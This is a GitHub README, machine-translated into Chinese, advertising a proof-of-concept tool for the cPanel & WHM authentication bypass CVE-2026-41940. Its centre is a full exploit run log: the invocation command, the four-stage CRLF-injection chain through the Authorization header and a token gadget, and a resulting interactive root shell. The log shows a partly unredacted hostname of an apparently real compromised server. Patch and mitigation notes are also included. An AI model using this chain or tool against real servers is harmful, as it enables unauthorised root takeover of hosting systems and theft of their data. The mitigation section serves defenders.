0xBlackash/CVE-2026-41940

GitHub: 0xBlackash/CVE-2026-41940

针对 cPanel & WHM 预身份验证绕过漏洞(CVE-2026-41940)的 PoC 利用工具,通过 CRLF 注入实现无需凭据的 root 级远程接管。

Stars: 0 | Forks: 1

# ⚠️ CVE-2026-41940 - cPanel & WHM 身份验证绕过 ChatGPT Image May 1, 2026, 08_27_37 PM CVSS 9.8 Critical Actively Exploited ### **cPanel & WHM 中的严重预身份验证绕过漏洞**
## 📌 概述 **CVE-2026-41940** 是一个影响 **cPanel & WHM** 和 **WP Squared** 的**严重身份验证绕过**漏洞。 未经身份验证的远程攻击者可以完全绕过登录,获取服务器的**完全管理员 (root/WHM)** 访问权限。 该漏洞在补丁发布之前已被**在野主动利用**。 ## 🎯 严重程度 | 指标 | 值 | |---------------------|----------------| | **CVSS 3.1 评分** | **9.8** (严重) | | **CVSS 4.0 评分** | **9.3** (严重) | | **攻击向量** | 网络 | | **复杂性** | 低 | | **权限** | 无 | | **用户交互**| 无 | ## 🛠️ 受影响的产品 - **cPanel & WHM** — 11.40 之后的所有版本(直至发布补丁) - **WP Squared** — **136.1.7** 之前的版本 ## 🔥 影响 成功利用此漏洞可使攻击者: - 获取完整的 WHM/root 访问权限 - 接管所有托管的网站和账户 - 修改服务器配置 - 窃取敏感数据 - 部署持久化后门 ### ✅ 成功的利用结果如下(如你展示的 Eye Security 截图所示): 如果利用成功,你应该会看到类似以下的内容: ``` ┌──(kali㉿kali)-[~] └─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell [sudo] password for kali: ██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗ ██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║ ██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║ ████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║ ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection 4-stage: preauth → CRLF inject → propagate → verify → post-exploit Author : Ashraf Zaryouh / @0xBlackash Configuration: Targets : 1 Threads : 10 Timeout : 15s Action : shell 13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087 13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx 13:41:19 [INFO] Canonical: server.softsms.in 13:41:19 [STEP] Stage 1/4 — Minting preauth session... 13:41:20 [ OK] Stage1: preauth session = :W43DhFApxxxD8Jdw... 13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header... 13:41:21 [ OK] Stage2: HTTP 307 → token=/cpsess263xxxx267 13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)... 13:41:22 [ OK] Stage3: HTTP 401 — do_token_denied gadget fired 13:41:22 [STEP] Stage 4/4 — Verifying WHM root access... 13:41:24 [INFO] Stage4: HTTP 200 {"version":"11.86.0.40"} 13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! https://xx.xx.xx.xx:2087 13:41:24 [PWND] Token : /cpsess2634xxxx267 13:41:24 [PWND] Session : :W43DhFApxxxD8Jdw... 13:41:24 [PWND] Version : 11.86.0.40 13:41:24 [PWND] API URL : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version 13:41:24 [ API] Running post-exploit action: shell ════════════════════════════════════════════════════════════ WHM Shell — server.xxxxxxx.xx Version: CVE-2026-41940 | Auth: CRLF bypass Type 'help' for commands, 'exit' to quit ════════════════════════════════════════════════════════════ 0xBlackash@server.xxxxxxx.xx ▶ id 13:41:28 [ API] gethostname → HTTP 500 uid=0(root) gid=0(root) groups=0(root) 0xBlackash@server.xxxxxxx.xx ▶ exit Exiting shell. ══════════════════════════════════════════════════════════════════════ CVE-2026-41940.py — CVE-2026-41940 Scan Complete Time: 13.9s · Targets: 1 ────────────────────────────────────────────────────────────────────── ⚡ 1 VULNERABLE TARGET(S) Target : https://xx.xx.xx.xx:2087 Version : 11.86.0.40 Token : /cpsess263xxxx267 API URL : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version Session : :W43DhFApxxxD8Jdw... Evidence : {"version":"11.86.0.40"} ══════════════════════════════════════════════════════════════════════ ``` ## ✅ 已修复版本 **已于 2026 年 4 月 28 日修补** - 将 **cPanel & WHM** 更新至最新版本 - 将 **WP Squared** 更新至 **136.1.7** 或更高版本 **建议立即采取行动** ## 🛡️ 缓解与防护 - **立即**更新至最新版本 - 阻止对端口 `2082`、`2083`、`2086`、`2087` 的公共访问 - 启用 WAF 规则(Cloudflare、ModSecurity 等) - 使用 IP 白名单或 VPN 进行管理访问 ## 📚 参考资料 - [NVD - CVE-2026-41940](https://nvd.nist.gov/vuln/detail/CVE-2026-41940) - [watchTowr Labs - 技术深入分析](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/) - [cPanel 官方安全公告](https://support.cpanel.net/hc/en-us/articles/40073787579671) - [CISA KEV 目录](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
**出于 ❤️ 为安全社区而作** **最后更新:2026 年 5 月**
标签:0day漏洞, CISA项目, cPanel, CVE-2026-41940, CVSS 9.8, OPA, PoC, Python, RCE, URL发现, Web主机管理, Web安全, Web报告查看器, WHM, WP Squared, 协议分析, 安全检测, 攻击路径可视化, 数据展示, 无后门, 暴力破解, 服务器接管, 权限提升, 红队, 编程工具, 网络安全, 蓝队分析, 认证绕过, 身份验证绕过, 远程代码执行, 隐私保护, 靶场, 预认证漏洞, 高危漏洞, 黑客工具